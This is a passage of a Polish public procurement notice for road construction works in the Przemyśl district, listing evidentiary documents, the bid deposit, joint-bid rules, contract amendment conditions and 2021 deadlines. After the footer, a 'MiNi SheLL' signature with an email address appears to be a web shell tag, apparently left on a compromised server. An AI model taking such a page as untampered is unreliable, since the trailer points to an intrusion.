zdolności<br/>są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty<br/>wezwiewykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie,<br/>niekrótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych<br/>środkówdowodowych:1) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji iInformacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia, w<br/>szczególnościodpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie robotami<br/>budowlanymi, wraz zinformacją na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenianiezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nieczynności oraz informacją o podstawie dysponowania tymi osobami PODMIOTY<br/>ZAGRANICZNE:1)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium<br/>Rzeczypospolitej Polskiej,zamiast dokumentu, o których mowa w ust. 1pkt 2 składa dokument lub<br/>dokumenty wystawione wkraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, żenie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o<br/>którym mowa powyżej, powinienbyć wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu<br/>składania ofert.2) Jeżeli w kraju,w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie<br/>wydaje się dokumentów, o którychmowa w ust. 1 pkt 2, zastępuje się je w całości lub części<br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym,<br/>administracyjnym albo organem samorząduzawodowego lub gospodarczego właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> WYKAZ PODMIOTOWYCH ŚRODKÓW DOWODOWYCH1) DOKUMENTYSKŁADANE RAZEM<br/>Z OFERTĄ1. Oferta składana jest pod rygorem nieważności w formieelektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.2.Wykonawca<br/>dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunkówudziału w<br/>postępowaniu w zakresie wskazanym w SWZ. Oświadczenie to stanowi dowódpotwierdzający<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na<br/>dzieńskładania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe,<br/>wskazane wrozdziale II podrozdziale 8 pkt 2 SWZ.3. Oświadczenie składane jest pod rygorem<br/>nieważności wformie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym,<br/>lub podpisemosobistym.WYKONAWCA JEST ZOBOWIĄZANY ZŁOŻYĆ TAKŻE WRAZ Z<br/>OFERTĄ: 1)OŚWIADZCENIE podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tegopodmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu; (<br/>jeżeli dotyczy)2)OŚWIADCZENIE wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia z którego wynika,które roboty budowlane lub dostawy lub usługi wykonają<br/>poszczególni wykonawcy ( jeżelidotyczy)OŚWIADCZENIE potwierdzające brak podstaw<br/>wykluczenia podwykonawcy, na którychzasobach wykonawca nie polega przy wykazywaniu<br/>spełnienia warunków udziału w postępowaniu (jeżeli dotyczy)DO OFERTY WYKONAWCA<br/>ZAŁĄCZA RÓWNIEŻ: 1) ZOBOWIĄZANIE podmiotuudostępniającego zasoby ( jeżeli dotyczy)2)<br/>dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli<br/>dotyczy);3) WYKAZ ROZWIĄZAŃ RÓWNOWAŻNYCH wykonawca załącza do oferty wykaz<br/>rozwiązań równoważnych z jego opisem lub normami (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 10.	WYMAGANIA DOTYCZĄCE WADIUM <br/>1)	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: <br/>5.500,00 zł (słownie: pięć tysięcy pięćset 00/100 złotych)<br/>2)	Wadium musi obejmować pełen okres związania ofertą tj. do 22.09.2021 r.<br/>3)	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego numer rachunku 21 1020 4391 0000 6602 0201 7754 Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego).<br/>5)	Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>-	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Zarząd Dróg Powiatowych w Przemyślu<br/>-	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>-	kwotę gwarancji/poręczenia,<br/>-	termin ważności gwarancji/poręczenia,<br/>-	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>6)	W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>7)	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>8)	Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 58 ustawyPzp.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego: •<br/>Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego.• Wszelkakorespondencja będzie<br/>prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.• jeżelioferta Wykonawców, o<br/>których mowa w pkt c, zostanie wybrana, zamawiający zastrzega możliwość żądania przed<br/>zawarciem umowy w sprawie zamówienia publicznego, przedłożenia umowy regulującej współpracę tych Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.przesunięcia terminu wykonania przedmiotu umowy :1.1.z uwagi na niekorzystne<br/>warunkiatmosferyczne uniemożliwiające wykonywanie prac (na okoliczność wystąpienia<br/>wymienionegofaktu Wykonawca sporządzi notatkę służbową, która wymaga potwierdzenia<br/>przez InspektoraNadzoru i zwróci się do zamawiającego z pisemnym wnioskiem o przesuniecie<br/>terminuwykonania przedmiotu umowy podając przyczynę i proponowany termin zakończenia<br/>prac, którynie może być dłuższy od faktycznego okresu przerwy lub postoju)2. przypadku<br/>zaistnieniaokoliczności niezależnych od Wykonawcy, w szczególności z powodu:a) istnienia<br/>braków wdokumentacji o czas niezbędny na ich uzupełnienie, b) konieczności wykonywania<br/>części robótw inny sposób niż założony w projekcie. Wynagrodzenie dla robót zamiennych<br/>zostanieokreślone na podstawie stawek i cen jednostkowych podanych w oparciu o bieżącą<br/>wycenę tychrobót, c) opóźnienia dostępu do placu budowy,d) w przypadku konieczności<br/>wykonania robótdodatkowych albo innych robót, które są niezbędne do dokończenia realizacji<br/>przedmiotowegozamówienia,e) wstrzymania robót przez organy administracji publicznej,f)<br/>działania siły wyższej(np. klęski żywiołowe, strajki lokalne lub generalne) mające bezpośredni<br/>wpływ na terminowośćwykonywanych robót),g) zawieszenia robót przez Zamawiającego .3.<br/>rezygnacji z części pracy -w razie zaistnienia okoliczności, w których zbędne będzie wykonanie<br/>danej części zamówienia,wraz ze związanym z tym obniżeniem wynagrodzenia (w takim<br/>przypadku Wykonawcaprzygotuje przy udziale Zamawiającego protokół sporządzony na dzień<br/>rezygnacji, w którymStrony określą prace, z wykonania których Zamawiający zrezygnował oraz<br/>wysokość kwoty, októrą zostanie obniżone wynagrodzenie),4. konieczności wykonania robót<br/>zamiennych robotyzamienne będą mogły wystąpić wówczas, gdy część robót opisanych w<br/>dokumentacji nie będziewykonywana zaś strony uzgodnią w tym samym zakresie wartościowym<br/>wykonanie innych,koniecznych robót.5. zmiany sposobu realizacji zamówienia - wynikającej ze<br/>zmian wobowiązujących przepisach prawa bądź wytycznych mających wpływ na realizację<br/>przedmiotuumowy,6. konieczności wykonywania robót nieprzewidzianych i niewycenionych w<br/>ofercie,7.zmiana osób wskazanych w umowie pełniących kontrolę i nadzór nad<br/>realizowanymzamówieniema) zmiany kierownika budowyb) zmiany inspektora<br/>nadzoruZamawiający z własnejinicjatywy proponuje zmianę inspektora nadzoru w następujących<br/>przypadkach :- śmierci,choroby lub innych zdarzeń losowych inspektora nadzoru,-<br/>niewywiązywania się przezinspektora nadzoru z obowiązków wynikających z umowy,-<br/>konieczności zmiany z innychprzyczyn niezależnych od Zamawiającego-np. rezygnacja, itp.<br/>Wykonawca może żądać odZamawiającego dokonania zmiany inspektora nadzoru wskazanego<br/>w umowie, jeżeli uzna, żeinspektor nadzoru nie wykonuje obowiązków wynikających z umowy.<br/>W przypadku dokonaniaw/w zmian - nowy inspektor nadzoru musi spełniać wymagania<br/>określone w SpecyfikacjiIstotnych Warunków Zamówienia. 8.innych istotnych postanowień<br/>umowy - gdy ich zmiana jestkonieczna w związku ze zmianą przepisów prawa powszechnie<br/>obowiązującego w zakresiemającym wpływ na realizacje przedmiotu zamówienia , w tym<br/>również zmiany stawki podatkuVAT9.wartości zamówienia – łączna wartość zmian jest mniejsza<br/>niż progi unijne oraz jest niższa niż 15 % wartości pierwotnej umowy, a zmiany te nie powodują<br/>zmiany ogólnego charakteru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zp.powiat.przemysl.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-24 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-22</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-09 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com